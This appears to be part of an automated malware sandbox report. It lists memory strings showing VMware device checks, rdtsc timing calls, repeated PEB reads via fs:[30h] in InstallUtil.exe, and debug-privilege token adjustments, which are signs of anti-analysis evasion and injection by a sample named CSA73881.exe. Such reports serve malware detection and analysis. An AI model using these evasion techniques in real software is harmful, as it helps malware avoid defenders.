Source: explorer.exe, 00000010.00000000.386869206.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 00000010.00000000.435627274.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000010.00000000.435840749.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000000.386869206.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000010.00000000.342446094.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000000.377793288.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000010.00000000.357973152.000000000820E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000010.00000000.386869206.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: explorer.exe, 00000010.00000000.406845206.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000010.00000000.386869206.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 14_2_01395BA5 rdtsc

14_2_01395BA5

Source: C:\Users\user\Desktop\CSA73881.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120 mov eax, dword ptr fs:[00000030h]	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120 mov eax, dword ptr fs:[00000030h]	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120 mov eax, dword ptr fs:[00000030h]	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120 mov eax, dword ptr fs:[00000030h]	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120 mov ecx, dword ptr fs:[00000030h]	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F513A mov eax, dword ptr fs:[00000030h]	14_2_012F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F513A mov eax, dword ptr fs:[00000030h]	14_2_012F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9100 mov eax, dword ptr fs:[00000030h]	14_2_012C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9100 mov eax, dword ptr fs:[00000030h]	14_2_012C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9100 mov eax, dword ptr fs:[00000030h]	14_2_012C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CC962 mov eax, dword ptr fs:[00000030h]	14_2_012CC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CB171 mov eax, dword ptr fs:[00000030h]	14_2_012CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CB171 mov eax, dword ptr fs:[00000030h]	14_2_012CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EB944 mov eax, dword ptr fs:[00000030h]	14_2_012EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EB944 mov eax, dword ptr fs:[00000030h]	14_2_012EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013451BE mov eax, dword ptr fs:[00000030h]	14_2_013451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013451BE mov eax, dword ptr fs:[00000030h]	14_2_013451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013451BE mov eax, dword ptr fs:[00000030h]	14_2_013451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013451BE mov eax, dword ptr fs:[00000030h]	14_2_013451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F61A0 mov eax, dword ptr fs:[00000030h]	14_2_012F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F61A0 mov eax, dword ptr fs:[00000030h]	14_2_012F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013469A6 mov eax, dword ptr fs:[00000030h]	14_2_013469A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013849A4 mov eax, dword ptr fs:[00000030h]	14_2_013849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013849A4 mov eax, dword ptr fs:[00000030h]	14_2_013849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013849A4 mov eax, dword ptr fs:[00000030h]	14_2_013849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013849A4 mov eax, dword ptr fs:[00000030h]	14_2_013849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FA185 mov eax, dword ptr fs:[00000030h]	14_2_012FA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EC182 mov eax, dword ptr fs:[00000030h]	14_2_012EC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2990 mov eax, dword ptr fs:[00000030h]	14_2_012F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_012CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_012CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_012CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013541E8 mov eax, dword ptr fs:[00000030h]	14_2_013541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F002D mov eax, dword ptr fs:[00000030h]	14_2_012F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F002D mov eax, dword ptr fs:[00000030h]	14_2_012F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F002D mov eax, dword ptr fs:[00000030h]	14_2_012F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F002D mov eax, dword ptr fs:[00000030h]	14_2_012F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F002D mov eax, dword ptr fs:[00000030h]	14_2_012F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DB02A mov eax, dword ptr fs:[00000030h]	14_2_012DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DB02A mov eax, dword ptr fs:[00000030h]	14_2_012DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DB02A mov eax, dword ptr fs:[00000030h]	14_2_012DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DB02A mov eax, dword ptr fs:[00000030h]	14_2_012DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA830 mov eax, dword ptr fs:[00000030h]	14_2_012EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA830 mov eax, dword ptr fs:[00000030h]	14_2_012EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA830 mov eax, dword ptr fs:[00000030h]	14_2_012EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA830 mov eax, dword ptr fs:[00000030h]	14_2_012EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347016 mov eax, dword ptr fs:[00000030h]	14_2_01347016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347016 mov eax, dword ptr fs:[00000030h]	14_2_01347016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01347016 mov eax, dword ptr fs:[00000030h]	14_2_01347016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01394015 mov eax, dword ptr fs:[00000030h]	14_2_01394015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01394015 mov eax, dword ptr fs:[00000030h]	14_2_01394015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01382073 mov eax, dword ptr fs:[00000030h]	14_2_01382073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01391074 mov eax, dword ptr fs:[00000030h]	14_2_01391074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E0050 mov eax, dword ptr fs:[00000030h]	14_2_012E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E0050 mov eax, dword ptr fs:[00000030h]	14_2_012E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0 mov eax, dword ptr fs:[00000030h]	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FF0BF mov ecx, dword ptr fs:[00000030h]	14_2_012FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FF0BF mov eax, dword ptr fs:[00000030h]	14_2_012FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FF0BF mov eax, dword ptr fs:[00000030h]	14_2_012FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013090AF mov eax, dword ptr fs:[00000030h]	14_2_013090AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9080 mov eax, dword ptr fs:[00000030h]	14_2_012C9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01343884 mov eax, dword ptr fs:[00000030h]	14_2_01343884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01343884 mov eax, dword ptr fs:[00000030h]	14_2_01343884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C58EC mov eax, dword ptr fs:[00000030h]	14_2_012C58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C40E1 mov eax, dword ptr fs:[00000030h]	14_2_012C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C40E1 mov eax, dword ptr fs:[00000030h]	14_2_012C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C40E1 mov eax, dword ptr fs:[00000030h]	14_2_012C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov ecx, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0135B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0135B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138131B mov eax, dword ptr fs:[00000030h]	14_2_0138131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CDB60 mov ecx, dword ptr fs:[00000030h]	14_2_012CDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F3B7A mov eax, dword ptr fs:[00000030h]	14_2_012F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F3B7A mov eax, dword ptr fs:[00000030h]	14_2_012F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398B58 mov eax, dword ptr fs:[00000030h]	14_2_01398B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CDB40 mov eax, dword ptr fs:[00000030h]	14_2_012CDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CF358 mov eax, dword ptr fs:[00000030h]	14_2_012CF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4BAD mov eax, dword ptr fs:[00000030h]	14_2_012F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4BAD mov eax, dword ptr fs:[00000030h]	14_2_012F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F4BAD mov eax, dword ptr fs:[00000030h]	14_2_012F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01395BA5 mov eax, dword ptr fs:[00000030h]	14_2_01395BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D1B8F mov eax, dword ptr fs:[00000030h]	14_2_012D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D1B8F mov eax, dword ptr fs:[00000030h]	14_2_012D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138138A mov eax, dword ptr fs:[00000030h]	14_2_0138138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137D380 mov ecx, dword ptr fs:[00000030h]	14_2_0137D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2397 mov eax, dword ptr fs:[00000030h]	14_2_012F2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FB390 mov eax, dword ptr fs:[00000030h]	14_2_012FB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EDBE9 mov eax, dword ptr fs:[00000030h]	14_2_012EDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F03E2 mov eax, dword ptr fs:[00000030h]	14_2_012F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013453CA mov eax, dword ptr fs:[00000030h]	14_2_013453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013453CA mov eax, dword ptr fs:[00000030h]	14_2_013453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA229 mov eax, dword ptr fs:[00000030h]	14_2_012EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01304A2C mov eax, dword ptr fs:[00000030h]	14_2_01304A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01304A2C mov eax, dword ptr fs:[00000030h]	14_2_01304A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D8A0A mov eax, dword ptr fs:[00000030h]	14_2_012D8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138AA16 mov eax, dword ptr fs:[00000030h]	14_2_0138AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138AA16 mov eax, dword ptr fs:[00000030h]	14_2_0138AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E3A1C mov eax, dword ptr fs:[00000030h]	14_2_012E3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CAA16 mov eax, dword ptr fs:[00000030h]	14_2_012CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CAA16 mov eax, dword ptr fs:[00000030h]	14_2_012CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C5210 mov eax, dword ptr fs:[00000030h]	14_2_012C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C5210 mov ecx, dword ptr fs:[00000030h]	14_2_012C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C5210 mov eax, dword ptr fs:[00000030h]	14_2_012C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C5210 mov eax, dword ptr fs:[00000030h]	14_2_012C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130927A mov eax, dword ptr fs:[00000030h]	14_2_0130927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137B260 mov eax, dword ptr fs:[00000030h]	14_2_0137B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137B260 mov eax, dword ptr fs:[00000030h]	14_2_0137B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398A62 mov eax, dword ptr fs:[00000030h]	14_2_01398A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01354257 mov eax, dword ptr fs:[00000030h]	14_2_01354257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9240 mov eax, dword ptr fs:[00000030h]	14_2_012C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9240 mov eax, dword ptr fs:[00000030h]	14_2_012C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9240 mov eax, dword ptr fs:[00000030h]	14_2_012C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C9240 mov eax, dword ptr fs:[00000030h]	14_2_012C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138EA55 mov eax, dword ptr fs:[00000030h]	14_2_0138EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C52A5 mov eax, dword ptr fs:[00000030h]	14_2_012C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C52A5 mov eax, dword ptr fs:[00000030h]	14_2_012C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C52A5 mov eax, dword ptr fs:[00000030h]	14_2_012C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C52A5 mov eax, dword ptr fs:[00000030h]	14_2_012C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C52A5 mov eax, dword ptr fs:[00000030h]	14_2_012C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DAAB0 mov eax, dword ptr fs:[00000030h]	14_2_012DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DAAB0 mov eax, dword ptr fs:[00000030h]	14_2_012DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FFAB0 mov eax, dword ptr fs:[00000030h]	14_2_012FFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FD294 mov eax, dword ptr fs:[00000030h]	14_2_012FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FD294 mov eax, dword ptr fs:[00000030h]	14_2_012FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2AE4 mov eax, dword ptr fs:[00000030h]	14_2_012F2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2ACB mov eax, dword ptr fs:[00000030h]	14_2_012F2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138E539 mov eax, dword ptr fs:[00000030h]	14_2_0138E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0134A537 mov eax, dword ptr fs:[00000030h]	14_2_0134A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01398D34 mov eax, dword ptr fs:[00000030h]	14_2_01398D34
